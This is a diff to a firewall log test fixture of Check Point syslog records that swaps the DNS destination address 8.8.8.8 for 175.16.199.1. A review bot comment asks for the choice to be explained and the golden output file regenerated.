 <134>1 2020-03-29T16:57:32Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d37c,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43372"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:57:32Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d37c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44361"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48514"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:36Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d380,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; log_delay:"1585501056"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52040"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d38d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63167"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
 <134>1 2020-03-29T16:57:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d391,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50060"; service:"443"; service_id:"https"; src:"192.168.1.117"]
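Review bot: The `+` lines in this hunk swap the `dst` of the DNS records from 8.8.8.8 to 175.16.199.1, which is an ordinary routable unicast address rather than one of the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24); the choice looks deliberate, so a one-line note in the PR description or next to the fixture saying why this particular address is used would stop a later maintainer from "correcting" it. The same substitution appears in the surrounding hunks of this file. Since `dst` feeds `destination.ip` and any geo/AS enrichment in the pipeline, the expected-output file for this fixture presumably has to be regenerated in the same change, or the golden-file test will fail.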
@@ -1756,37 +1756,37 @@
 <134>1 2020-03-29T16:58:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d39f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44134"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3a1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:58:11Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3a3,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:58:12Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501092"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50195"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:12Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501092"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50195"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:12Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.19.196"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42728"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41324"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41326"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a4,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.206"; log_delay:"1585501092"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41328"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40874"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40874"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.78"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49956"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.99"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41556"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56870"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"216.58.211.110"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54412"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55908"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55908"; service:"53"; 
